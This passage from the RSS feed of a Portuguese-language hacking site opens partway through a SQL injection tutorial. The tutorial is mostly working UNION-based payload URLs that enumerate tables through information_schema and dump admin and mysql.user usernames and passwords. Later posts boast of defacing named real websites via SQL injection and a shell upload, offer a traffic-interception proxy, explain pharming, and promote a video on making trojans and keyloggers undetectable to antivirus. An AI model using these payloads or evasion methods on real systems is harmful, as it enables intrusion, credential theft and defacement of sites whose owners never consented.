<p>Ou então as funções hex() e unhex();<br />
<code>http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/</code></p>
<p>Com os procedimentos acima, você irá conseguir achar a versão do SGBD MySql.</p>
<p><strong>E) &#8211; Obtendo o nome da Coluna/Tabela.</strong></p>
<p>Agora que temos a versão, iremos ao passo seguinte. Descobrir o nome das Colunas/Tabelas:</p>
<p>Geralmente os DBA&#8217;s (Administradores de Banco de Dados) utilizam nomes comuns como padronização para suas Colunas/Tabelas como:<br />
<code>user, usuario, admin, member, membro, password, passwd, pwd, user_name</code></p>
<p>Lógico que isto depende bastante de DBA&#8217;s e qual tipo de padronização ele estiver utilizando.</p>
<p>Na consulta abaixo o &#8220;Injectador&#8221; bicuda, isto mesmo ele utiliza a técnica de tentativo-erro, para tentar acertar o nome da Coluna/Tabela.<br />
<code>http://www.site.com/news.php?id=5 union all select 1,2,3 from admin</code></p>
<p>Observe que acima a query diz: &#8220;Mostre-me os valores das Colunas/Tabelas 1, 2 e 3 do usuário admin&#8221;.<br />
<code>http://www.site.com/news.php?id=5 union all select 1,username,3 from admin</code></p>
<p>Caso apareça erro, vá mudando o nome da coluna&#8230; afinal é a técnica da tentativa e erro.<br />
<code>http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/</code></p>
<p>Acima, observe que a consulta começa a ficar refinada: &#8220;Mostre-me os valores Coluna/Tabelas 1, o nome do usuário e 3 do usuário admin&#8221;. Ou seja, suponha que o DBA tenha criado um banco onde as ele separou a Tabela admin, como o exemplo. No entanto, este admin possui inumeras informações (campos) como: nome do admin (username), password, endereco, idade.. etc.<br />
<code>http://www.site.com/news.php?id=5 union all select 1,username, password from admin</code></p>
<p>Caso a consulta der certo, na tela aparecerá o nome do usuário e a senha. Esta senha aparecerá na tela tanto como texto ou criptografada, em md5 hash.. etc. Vai depender muito da base de dados onde foi desenvolvido o banco.</p>
<p>Para ficar com um boa aparência e organizada as informações na tela. É utilizado a função concat().<br />
<code>http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*</code></p>
<p>Dependendo do campo, fica a seu critério inserir em hexadecimal (0&#215;3a) ou utilizando o padrão Ascii (char(58)).<br />
<code>http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*</code></p>
<p>Na tela já aparecerá os valores com o nome do usuário administrador e a senha. Faça orações para que não aparece em hash md5 senão vai ser outra guerra.. <img src='http://www.invasaohacking.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>Dica: Quando está difícil para achar o nome da Coluna/Tabela, sempre é bom utilizar mysql.user, pois é muito utilizado como default e como padrão. Exemplo abaixo.<br />
<code>http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*</code></p>
<p><strong>F) &#8211; MySql 5.</strong></p>
<p>Devido algumas diferenças atribuídas a versão 5 do MySql. É mostrado aqui uma técnica para obter o nome das Colunas/Tabelas.</p>
<p>Nesta nova versão, é acrescentada um arquivo chamado information_schema, onde possui informações sobre todas as Colunas/Tabelas do banco. É este arquivo que será o nosso alvo.<br />
<code>http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*</code></p>
<p>Na consulta acima substituimos o campo 2 por table_name para obter a primeira tabela de information_schema.</p>
<p>Agora para que a consulta seja rápida é necessário acrescentar um limite para as linhas.</p>
<p>Observe abaixo que é colocado como limite 0, 1.<br />
<code>http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*</code></p>
<p>Dica: você deve ir acrescentando os valores dos limites: 1, 2; 3,4. Vai depender de você, pois vamos supor que o alvo principal é a Coluna/Tabela admin_password e está está na posição 43, então você deveria acrescentar uma por uma até achar&#8230; 1, 2; &#8230;, &#8230;; 42, 43.</p>
<p>Espero que tenham entendido esta parte.</p>
<p>Para obter o nome das colunas, também é utilizado a mesma lógica. Só que agora no arquivo information_schema.columns.<br />
<code>http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*</code></p>
<p>Agora vamos a uma consulta mais específica. Caso você queira que apareça informações mais específica como o nome dos usuário pode-se fazer a consulta abaixo:<br />
<code>http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/</code></p>
<p>Com esta consulta é visualizado o nome das colunas.. agora é só utilizar os limites para visualizar os nomes de usuários.</p>
<p>Caso os valores estejam em colunas diferentes (lugares) vamos concatenar utilizando o concat().<br />
<code>http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*</code></p>
<p>Acima simplesmente pedimos para mostrar o usuário, a senha e o email.<br />
<code>example: admin:hash:whatever@blabla.com</code></p>
<p>Isto é um exemplo de Sql Injection. Não é uma técnica tão simples, necessita-se de prática e conhecimento em Sql.</p>
<p><strong>Autor:</strong> Marezzi (Inglês)</p>
]]></content:encoded>
			<wfw:commentRss>http://www.invasaohacking.com/2010/03/05/tutorial-sql-injection-mysql/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Deface no Site da Ufo.com.br e pdt.org.br</title>
		<link>http://www.invasaohacking.com/2010/03/05/deface-no-site-da-ufo-com-br-e-pdt-org-br/</link>
		<comments>http://www.invasaohacking.com/2010/03/05/deface-no-site-da-ufo-com-br-e-pdt-org-br/#comments</comments>
		<pubDate>Fri, 05 Mar 2010 04:36:40 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Video Aulas]]></category>
		<category><![CDATA[Aulas Hacking]]></category>
		<category><![CDATA[defaced]]></category>
		<category><![CDATA[Penetration Tests]]></category>
		<category><![CDATA[Sql Injection]]></category>

		<guid isPermaLink="false">http://www.invasaohacking.com/?p=583</guid>
		<description><![CDATA[
O Defacement (ou simplesmente deface) é um termo de origem inglesa para o ato de modificar ou danificar a superfície ou aparência de algum objeto  e é empregado comumente na Segurança da informação para categorizar os ataques realizados por defacers e script kiddies para modificar a página de um sítio na Internet.
Geralmente os ataques tem cunho político, objetivando disseminar uma mensagem do autor do ataque para os frequentadores do site alvo. Esses ataques podem também ter cunho pessoal, transformando-se em uma espécie de troféu para o autor — um ...]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><a href="http://www.invasaohacking.com/wp-content/uploads/2010/03/Deface-no-Site-da-Ufo.com_.br-e-pdt.org_.br_.png"><img class="size-full wp-image-584  aligncenter" title="Deface no Site da Ufo.com.br e pdt.org.br" src="http://www.invasaohacking.com/wp-content/uploads/2010/03/Deface-no-Site-da-Ufo.com_.br-e-pdt.org_.br_.png" alt="Deface no Site da Ufo.com.br e pdt.org.brpdt" width="380" height="336" /></a></p>
<p><strong>O Defacement</strong> (ou simplesmente deface) é um termo de origem inglesa para o ato de modificar ou danificar a superfície ou aparência de algum objeto  e é empregado comumente na Segurança da informação para categorizar os ataques realizados por defacers e script kiddies para modificar a página de um sítio na Internet.</p>
<p>Geralmente os ataques tem cunho político, objetivando disseminar uma mensagem do autor do ataque para os frequentadores do site alvo. Esses ataques podem também ter cunho pessoal, transformando-se em uma espécie de troféu para o autor — um prêmio pela sua capacidade de penetrar na segurança de um determinado sistema.</p>
<p>O ato pode ser analogamente comparado à pichação de muros e paredes. O autor do defacement geralmente é referenciado como defacer ou também pichador.</p>
<p>Grupos de Defacement são normalmente formados por crackers iniciantes entre 14 e 22 anos, em sua maioria tentando provar que tem capacidade e ser reconhecido pelos crackers.</p>
<p>Teem como alvo principal sites de governos e prefeituras de cidades.</p>
<p><strong>Descrição do Vídeo:</strong> Nele é mostrado explorando SQL Injection, injetando códigos na query e fazendo consultas no banco de dados onde consigo login e senha dos ” Administradores” tendo acesso ao Xpanel onde consigo fazer upload da Shell e desfigurando o site.</p>
<p><strong>Sites atacados:</strong> www.ufo.com.br , www.pdt.org.br</p>
<p><strong>Autor: </strong>B4silisco.</p>
<p><strong>Fonte:</strong> invasão</p>
<p><strong>Faça o Download desse vídeo</strong> <a href="http://rapidshare.com/files/348817707/SQL_injection.rar" target="_blank"><strong>clicando Aqui !!</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.invasaohacking.com/2010/03/05/deface-no-site-da-ufo-com-br-e-pdt-org-br/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Achilles 0.27</title>
		<link>http://www.invasaohacking.com/2010/03/01/achilles-0-27/</link>
		<comments>http://www.invasaohacking.com/2010/03/01/achilles-0-27/#comments</comments>
		<pubDate>Mon, 01 Mar 2010 03:29:28 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Rede]]></category>
		<category><![CDATA[Man in The Middle]]></category>

		<guid isPermaLink="false">http://www.invasaohacking.com/?p=580</guid>
		<description><![CDATA[Aplicação gratuita e muito útil que atua como um proxy HTTP/HTTPS.
Ela te dá a possibilidade de interceptar, armezenar em log e modificar o tráfico web em tempo real. Assista a nossa video aula praticando a técnica Man in the middle utilizando o achilles.
Gratuito
Tamanho: 423 KB
Sistema: Windows XP, Windows 2003, Windows Vista 32 Bits
Empresa: Achilles

]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.invasaohacking.com/wp-content/uploads/2010/03/Achilles_3194p.jpg"><img class="alignleft size-full wp-image-579" title="Achilles 0.27" src="http://www.invasaohacking.com/wp-content/uploads/2010/03/Achilles_3194p.jpg" alt="Achilles 0.27" width="180" height="135" /></a>Aplicação gratuita e muito útil que atua como um proxy HTTP/HTTPS.</p>
<p>Ela te dá a possibilidade de interceptar, armezenar em log e modificar o tráfico web em tempo real. Assista a nossa video aula praticando a técnica <a href="http://www.invasaohacking.com/2010/02/21/tecnica-man-in-the-middle-com-achilles/">Man in the middle</a> utilizando o achilles.</p>
<p><strong>Gratuito</strong><br />
<strong>Tamanho:</strong> 423 KB<br />
<strong>Sistema:</strong> Windows XP, Windows 2003, Windows Vista 32 Bits<br />
<strong>Empresa:</strong> Achilles</p>
<p><a href="http://www.4shared.com/file/231908524/3c09996/achilles_0_27_By_Diablos_4-Eve.html" target="_blank"><img class="alignleft size-full wp-image-43" title="Clique aqui para Baixar" src="http://www.invasaohacking.com/wp-content/uploads/2010/01/downloads.jpg" alt="" width="192" height="95" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.invasaohacking.com/2010/03/01/achilles-0-27/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Técnica Pharming</title>
		<link>http://www.invasaohacking.com/2010/02/21/tecnica-pharming/</link>
		<comments>http://www.invasaohacking.com/2010/02/21/tecnica-pharming/#comments</comments>
		<pubDate>Sun, 21 Feb 2010 04:25:16 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Video Aulas]]></category>
		<category><![CDATA[Aulas Hacking]]></category>
		<category><![CDATA[Penetration Tests]]></category>
		<category><![CDATA[Pharming]]></category>

		<guid isPermaLink="false">http://www.invasaohacking.com/?p=566</guid>
		<description><![CDATA[
Nesta video aula estaremos mostrando um pouco da técnica Pharming.
O que e Pharming? Em informática Pharming é o termo atribuído ao ataque baseado na técnica DNS cache poisoning (envenenamento de cache DNS) que, consiste em corromper o DNS (Sistema de Nomes de Domínio ou Domain Name System) em uma rede de computadores, fazendo com que a URL (Uniform Resource Locator ou Localizador Uniforme de Recursos) de um site passe a apontar para um servidor diferente do original.
Ao digitar a URL (endereço) do site que deseja acessar, um banco por exemplo, ...]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><a href="http://www.invasaohacking.com/wp-content/uploads/2010/02/Técnica-Pharming.jpg"><img class="size-full wp-image-567  aligncenter" title="Técnica Pharming" src="http://www.invasaohacking.com/wp-content/uploads/2010/02/Técnica-Pharming.jpg" alt="Técnica Pharming" width="498" height="432" /></a></p>
<p>Nesta video aula estaremos mostrando um pouco da técnica Pharming.</p>
<p><strong>O que e Pharming? </strong>Em informática Pharming é o termo atribuído ao ataque baseado na técnica DNS cache poisoning (<strong>envenenamento de cache DNS</strong>) que, consiste em corromper o DNS (<strong>Sistema de Nomes de Domínio ou Domain Name System</strong>) em uma rede de computadores, fazendo com que a URL (<strong>Uniform Resource Locator ou Localizador Uniforme de Recursos</strong>) de um site passe a apontar para um servidor diferente do original.</p>
<p>Ao digitar a URL (<strong>endereço</strong>) do site que deseja acessar, um banco por exemplo, o servidor DNS converte o endereço em um número IP, correspondente ao do servidor do banco. Se o servidor DNS estiver vulnerável a um ataque de Pharming, o endereço poderá apontar para uma página falsa hospedada em outro servidor com outro endereço IP, que esteja sob controle de um golpista.</p>
<p>Os golpistas geralmente copiam fielmente as páginas das instituições, criando a falsa impressão que o usuário está no site desejado e induzindo-o a fornecer seus dados privados como login ou números de contas e senha que serão armazenados pelo servidor falso.</p>
<p><strong>Para assistir o vídeo: </strong><a href="http://www.invasaohacking.com/aulas/Tecnica - Pharming/" target="_blank">Clique Aqui</a></p>
<p><strong>Autor:</strong> Fernando (<strong>DarkShadow</strong>)</p>
]]></content:encoded>
			<wfw:commentRss>http://www.invasaohacking.com/2010/02/21/tecnica-pharming/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Deixando Trojans Indetéctaveis</title>
		<link>http://www.invasaohacking.com/2010/02/21/deixando-trojans-indetectaveis/</link>
		<comments>http://www.invasaohacking.com/2010/02/21/deixando-trojans-indetectaveis/#comments</comments>
		<pubDate>Sun, 21 Feb 2010 03:34:16 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Video Aulas]]></category>
		<category><![CDATA[Deixar trojans indetectaveis]]></category>
		<category><![CDATA[Indetectavel]]></category>
		<category><![CDATA[Sources]]></category>

		<guid isPermaLink="false">http://www.invasaohacking.com/?p=560</guid>
		<description><![CDATA[
Nesta video aula vamos ensinar como deichar seu trojan/Keylogger ou qualquer outro malware  feito em delphi Indetectavel. O importante e ter o source do trojan ou keylogger para poder deixalos indetectaveis pelos antivirus. Não tem o source? Não se preocupe! Ainda não temos no site mas vamos postar varios essa semana  
Para assistir o vídeo: Clique Aqui
Autor: R0dr1g0
]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><a href="http://www.invasaohacking.com/wp-content/uploads/2010/02/Deixando-Trojans-Indetéctaveis.png"><img class="aligncenter size-full wp-image-561" title="Deixando Trojans Indetéctaveis" src="http://www.invasaohacking.com/wp-content/uploads/2010/02/Deixando-Trojans-Indetéctaveis.png" alt="Deixando Trojans Indetéctaveis" width="274" height="123" /></a></p>
<p>Nesta video aula vamos ensinar como deichar seu trojan/Keylogger ou qualquer outro malware  feito em delphi Indetectavel. O importante e ter o source do trojan ou keylogger para poder deixalos indetectaveis pelos antivirus. Não tem o source? Não se preocupe! Ainda não temos no site mas vamos postar varios essa semana <img src='http://www.invasaohacking.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Para assistir o vídeo: <a href="http://www.invasaohacking.com/aulas/Indetectavel/" target="_blank">Clique Aqui</a></p>
<p><strong>Autor: </strong>R0dr1g0</p>
]]></content:encoded>
			<wfw:commentRss>http://www.invasaohacking.com/2010/02/21/deixando-trojans-indetectaveis/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
